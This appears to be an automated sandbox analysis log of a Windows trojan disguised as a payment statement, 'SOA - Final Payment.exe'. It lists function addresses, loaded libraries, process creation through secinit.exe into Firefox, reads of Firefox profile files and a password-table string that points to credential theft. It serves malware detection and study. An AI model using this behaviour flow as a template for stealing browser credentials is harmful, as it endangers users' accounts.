                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128B1B05_2_0128B1B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013401AA5_2_013401AA
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013381CC5_2_013381CC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133F0E05_2_0133F0E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013370E95_2_013370E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C05_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F0CC5_2_0132F0CC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133132D5_2_0133132D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133A3525_2_0133A352
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D34C5_2_0126D34C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C739A5_2_012C739A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013403E65_2_013403E6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F05_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013202745_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A05_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013212ED5_2_013212ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B2C05_2_0129B2C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012805355_2_01280535
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013375715_2_01337571
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131D5B05_2_0131D5B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013405915_2_01340591
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133F43F5_2_0133F43F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012714605_2_01271460
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013324465_2_01332446
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132E4F65_2_0132E4F6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012807705_2_01280770
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A47505_2_012A4750
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133F7B05_2_0133F7B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127C7C05_2_0127C7C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129C6E05_2_0129C6E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013316CC5_2_013316CC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012969625_2_01296962
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012899505_2_01289950
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B9505_2_0129B950
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012829A05_2_012829A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134A9A65_2_0134A9A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED8005_2_012ED800
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012828405_2_01282840
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128A8405_2_0128A840
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012668B85_2_012668B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012838E05_2_012838E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE8F05_2_012AE8F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FB765_2_0133FB76
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133AB405_2_0133AB40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129FB805_2_0129FB80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012BDBF95_2_012BDBF9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F5BF05_2_012F5BF0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01336BD75_2_01336BD7
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F3A6C5_2_012F3A6C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01337A465_2_01337A46
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FA495_2_0133FA49
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C5AA05_2_012C5AA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131DAAC5_2_0131DAAC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127EA805_2_0127EA80
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132DAC65_2_0132DAC6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128AD005_2_0128AD00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01337D735_2_01337D73
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01283D405_2_01283D40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01331D5A5_2_01331D5A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01298DBF5_2_01298DBF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127ADE05_2_0127ADE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129FDC05_2_0129FDC0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F9C325_2_012F9C32
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280C005_2_01280C00
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320CB55_2_01320CB5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FCF25_2_0133FCF2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01270CF25_2_01270CF2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C2F285_2_012C2F28
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A0F305_2_012A0F30
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FF095_2_0133FF09
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F4F405_2_012F4F40
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133FFB15_2_0133FFB1
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FEFA05_2_012FEFA0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281F925_2_01281F92
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128CFE05_2_0128CFE0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01272FC85_2_01272FC8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133EE265_2_0133EE26
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01280E595_2_01280E59
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01289EB05_2_01289EB0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133CE935_2_0133CE93
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01292E905_2_01292E90
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133EEDB5_2_0133EEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345A35210_2_0345A352
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034603E610_2_034603E6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AE3F010_2_033AE3F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344027410_2_03440274
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034202C010_2_034202C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0342815810_2_03428158
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339010010_2_03390100
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343A11810_2_0343A118
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034581CC10_2_034581CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034601AA10_2_034601AA
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343200010_2_03432000
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A077010_2_033A0770
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033C475010_2_033C4750
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339C7C010_2_0339C7C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BC6E010_2_033BC6E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A053510_2_033A0535
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0346059110_2_03460591
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345244610_2_03452446
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344442010_2_03444420
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344E4F610_2_0344E4F6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345AB4010_2_0345AB40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03456BD710_2_03456BD7
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339EA8010_2_0339EA80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033B696210_2_033B6962
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A29A010_2_033A29A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0346A9A610_2_0346A9A6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AA84010_2_033AA840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A284010_2_033A2840
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033868B810_2_033868B8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033CE8F010_2_033CE8F0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03414F4010_2_03414F40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033C0F3010_2_033C0F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033E2F2810_2_033E2F28
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03442F3010_2_03442F30
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033ACFE010_2_033ACFE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0341EFA010_2_0341EFA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03392FC810_2_03392FC8
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345EE2610_2_0345EE26
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A0E5910_2_033A0E59
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345EEDB10_2_0345EEDB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033B2E9010_2_033B2E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345CE9310_2_0345CE93
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AAD0010_2_033AAD00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343CD1F10_2_0343CD1F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033B8DBF10_2_033B8DBF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339ADE010_2_0339ADE0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A0C0010_2_033A0C00
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03390CF210_2_03390CF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03440CB510_2_03440CB5
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345132D10_2_0345132D
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0338D34C10_2_0338D34C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033E739A10_2_033E739A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A52A010_2_033A52A0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034412ED10_2_034412ED
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BB2C010_2_033BB2C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0346B16B10_2_0346B16B
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0338F17210_2_0338F172
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033D516C10_2_033D516C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033AB1B010_2_033AB1B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344F0CC10_2_0344F0CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345F0E010_2_0345F0E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034570E910_2_034570E9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A70C010_2_033A70C0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345F7B010_2_0345F7B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_034516CC10_2_034516CC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345757110_2_03457571
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343D5B010_2_0343D5B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0339146010_2_03391460
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345F43F10_2_0345F43F
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FB7610_2_0345FB76
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03415BF010_2_03415BF0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BFB8010_2_033BFB80
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033DDBF910_2_033DDBF9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03457A4610_2_03457A46
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FA4910_2_0345FA49
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03413A6C10_2_03413A6C
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0344DAC610_2_0344DAC6
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033E5AA010_2_033E5AA0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03441AA310_2_03441AA3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343DAAC10_2_0343DAAC
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0343591010_2_03435910
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A995010_2_033A9950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BB95010_2_033BB950
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0340D80010_2_0340D800
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A38E010_2_033A38E0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FF0910_2_0345FF09
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A1F9210_2_033A1F92
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FFB110_2_0345FFB1
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A9EB010_2_033A9EB0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03451D5A10_2_03451D5A
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03457D7310_2_03457D73
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033A3D4010_2_033A3D40
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_033BFDC010_2_033BFDC0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_03419C3210_2_03419C32
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0345FCF210_2_0345FCF2
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A61E9010_2_02A61E90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5AF6010_2_02A5AF60
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5CF7010_2_02A5CF70
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5CD4710_2_02A5CD47
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5CD5010_2_02A5CD50
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5B0AF10_2_02A5B0AF
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5B0B010_2_02A5B0B0
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A5B0F910_2_02A5B0F9
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A636FB10_2_02A636FB
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6370010_2_02A63700
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A6550010_2_02A65500
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_02A7BB9010_2_02A7BB90
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318E2C310_2_0318E2C3
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318E1A410_2_0318E1A4
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318D72810_2_0318D728
                Source: C:\Windows\SysWOW64\secinit.exeCode function: 10_2_0318E65C10_2_0318E65C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012EEA12 appears 86 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 0126B970 appears 268 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012C7E54 appears 95 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012FF290 appears 105 times
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: String function: 012B5130 appears 36 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0341F290 appears 105 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 033E7E54 appears 101 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 033D5130 appears 58 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0340EA12 appears 86 times
                Source: C:\Windows\SysWOW64\secinit.exeCode function: String function: 0338B970 appears 278 times
                Source: SOA - Final Payment.exe, 00000000.00000002.1380480533.000000000187E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000000.00000002.1389270028.000000000BE40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000000.00000000.1358800501.0000000000FE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegRvW.exe< vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000005.00000002.1731725620.000000000136D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe, 00000005.00000002.1731361843.0000000000D18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesecinitj% vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe Binary or memory string: OriginalFilenamegRvW.exe< vs SOA - Final Payment.exe
                Source: SOA - Final Payment.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SOA - Final Payment.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, a1PjpmmEEKL740qFJE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SOA - Final Payment.exe.4f611a8.3.raw.unpack, a1PjpmmEEKL740qFJE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, D10xcgnntUSUthDVjj.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, a1PjpmmEEKL740qFJE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SOA - Final Payment.exe.be40000.6.raw.unpack, a1PjpmmEEKL740qFJE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, a1PjpmmEEKL740qFJE.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SOA - Final Payment.exe.4feb9c8.2.raw.unpack, a1PjpmmEEKL740qFJE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/2@2/2
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SOA - Final Payment.exe.log
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Mutant created: NULL
                Source: C:\Windows\SysWOW64\secinit.exe File created: C:\Users\user\AppData\Local\Temp\472E1186
                Source: SOA - Final Payment.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: secinit.exe, 0000000A.00000002.2603324583.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.2603324583.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1940016861.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.1940016861.0000000002DFB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: SOA - Final Payment.exe Virustotal: Detection: 62%
                Source: SOA - Final Payment.exe ReversingLabs: Detection: 59%
                Source: unknown Process created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Process created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Process created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Process created: C:\Users\user\Desktop\SOA - Final Payment.exe "C:\Users\user\Desktop\SOA - Final Payment.exe"
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe Process created: C:\Windows\SysWOW64\secinit.exe "C:\Windows\SysWOW64\secinit.exe"
                Source: C:\Windows\SysWOW64\secinit.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Section loaded: iconcodecservice.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\secinit.exe Section loaded: wldp.dll
